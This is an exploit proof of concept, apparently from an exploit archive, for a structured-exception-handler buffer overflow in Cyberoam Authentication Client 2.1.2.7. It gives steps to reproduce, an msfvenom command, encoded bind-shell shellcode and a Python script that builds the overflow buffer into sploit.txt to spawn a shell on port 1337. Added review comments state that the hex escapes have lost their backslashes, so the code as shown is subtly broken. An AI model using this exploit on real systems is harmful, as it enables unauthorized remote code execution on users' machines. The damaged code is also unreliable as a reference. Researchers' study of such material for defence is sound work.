# Exploit Title: Cyberoam Authentication Client 2.1.2.7 - Buffer Overflow (SEH)
# Date: 2020-02-28
# Exploit Author: Andrey Stoykov
# Version: Cyberoam General Authentication Client 2.1.2.7
# Tested on: Windows Vista SP2 x86

Steps to Reproduce:

1) Run the PoC script below; it writes the file "sploit.txt"
2) Copy the contents of "sploit.txt" into the "Cyberoam Server Address" field and click "Check"
3) Bind TCP shell should spawn on port 1337

# Badchars to be avoided: "x0ax00x0dx01x02x03x04"
# msfvenom -p windows/shell_bind_tcp -f c -b "x0ax00x0dx01x02x03x04" lport=1337 -e x86/alpha_mixed

Exploit POC:

# Payload produced by the msfvenom command quoted above (windows/shell_bind_tcp,
# lport=1337, x86/alpha_mixed encoder), stored as one implicitly-concatenated
# string literal.  NOTE(review): as rendered on this page the hex escapes have
# lost their backslashes (e.g. "x89xe6" rather than a "\x.." escape), an
# extraction artefact; the literal as shown is therefore plain ASCII text, not
# the byte sequence the header describes.
shellcode = ("x89xe6xddxc5xd9x76xf4x5dx55x59x49x49x49x49x49"
"x49x49x49x49x49x43x43x43x43x43x43x37x51x5ax6a"
"x41x58x50x30x41x30x41x6bx41x41x51x32x41x42x32"
"x42x42x30x42x42x41x42x58x50x38x41x42x75x4ax49"
"x49x6cx6ax48x4ex62x77x70x43x30x67x70x43x50x6f"
"x79x6dx35x66x51x6fx30x71x74x6ex6bx42x70x66x50"
"x6ex6bx30x52x34x4cx6ex6bx76x32x32x34x4ex6bx30"
"x72x64x68x46x6fx6dx67x43x7ax54x66x70x31x39x6f"
"x4ex4cx77x4cx71x71x33x4cx46x62x66x4cx37x50x4b"
"x71x38x4fx54x4dx46x61x49x57x49x72x79x62x72x72"
"x71x47x6cx4bx43x62x74x50x4ex6bx70x4ax55x6cx6c"
"x4bx50x4cx77x61x73x48x4ax43x43x78x35x51x6ax71"
"x43x61x6cx4bx30x59x77x50x35x51x4ex33x6ex6bx33"
"x79x67x68x69x73x64x7ax77x39x6cx4bx75x64x4ex6b"
"x75x51x4ax76x66x51x59x6fx4ex4cx5ax61x58x4fx66"
"x6dx47x71x4ax67x45x68x49x70x73x45x59x66x47x73"
"x71x6dx68x78x67x4bx61x6dx76x44x62x55x78x64x70"
"x58x4ex6bx72x78x34x64x53x31x4ex33x52x46x6cx4b"
"x66x6cx52x6bx4cx4bx76x38x67x6cx73x31x5ax73x4c"
"x4bx34x44x6ex6bx57x71x6ax70x4ex69x33x74x36x44"
"x56x44x33x6bx71x4bx70x61x31x49x50x5ax46x31x69"
"x6fx79x70x53x6fx63x6fx30x5ax6ex6bx64x52x5ax4b"
"x4cx4dx61x4dx35x38x55x63x75x62x37x70x77x70x53"
"x58x62x57x71x63x76x52x43x6fx71x44x55x38x30x4c"
"x72x57x31x36x64x47x39x6fx69x45x4ex58x5ax30x75"
"x51x33x30x47x70x46x49x4bx74x42x74x32x70x30x68"
"x36x49x6dx50x50x6bx57x70x4bx4fx69x45x31x7ax53"
"x38x70x59x72x70x4ax42x39x6dx73x70x70x50x43x70"
"x66x30x42x48x6bx5ax36x6fx49x4fx4bx50x49x6fx79"
"x45x4cx57x42x48x75x52x45x50x35x55x35x69x4ex69"
"x4ax46x51x7ax52x30x62x76x36x37x50x68x4bx72x59"
"x4bx55x67x55x37x79x6fx4ax75x70x57x71x78x68x37"
"x79x79x67x48x79x6fx6bx4fx4ex35x33x67x43x58x63"
"x44x6ax4cx75x6bx4bx51x39x6fx49x45x32x77x6dx47"
"x52x48x70x75x70x6ex30x4dx53x51x79x6fx6bx65x31"
"x78x63x53x50x6dx42x44x67x70x6fx79x49x73x73x67"
"x72x77x62x77x64x71x4ax56x32x4ax54x52x46x39x33"
"x66x4ax42x79x6dx32x46x7ax67x50x44x71x34x75x6c"
"x67x71x56x61x6ex6dx33x74x51x34x52x30x38x46x53"
"x30x67x34x43x64x30x50x46x36x32x76x42x76x77x36"
"x53x66x72x6ex42x76x50x56x43x63x36x36x71x78x53"
"x49x68x4cx77x4fx6cx46x79x6fx49x45x6dx59x4dx30"
"x50x4ex70x56x63x76x79x6fx46x50x71x78x66x68x6d"
"x57x75x4dx55x30x69x6fx79x45x4fx4bx58x70x58x35"
"x4fx52x71x46x52x48x6cx66x6dx45x4dx6dx6fx6dx6b"
"x4fx69x45x75x6cx74x46x63x4cx47x7ax6bx30x59x6b"
"x39x70x31x65x77x75x6fx4bx72x67x62x33x50x72x30"
"x6fx42x4ax77x70x72x73x79x6fx59x45x41x41")

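# Assemble the contents of sploit.txt: 216 bytes of "A" padding, two 4-byte
# values (the SEH overwrite the title refers to), a 500-byte 0x90 sled, the
# payload, then "B" filler.  The filler length is computed so that everything
# except the payload sums to 16688 bytes; the finished buffer is therefore
# 16688 + len(shellcode) characters long.
# NOTE(review): the header lists Windows Vista SP2 x86 as the only tested
# target; whether this layout behaves the same where SEHOP/DEP apply to the
# client process is not established by anything on this page.
buffer = "A"*216 + "xebx10x90x90"+ "x97x44x9cx0f" + "x90"*500 + shellcode
buffer += "B"*(16688-216-8-500)
# Write the buffer out; the context manager closes the file even if write()
# raises, which the original open()/close() pair did not guarantee.
with open('sploit.txt', 'w') as f:
    f.write(buffer)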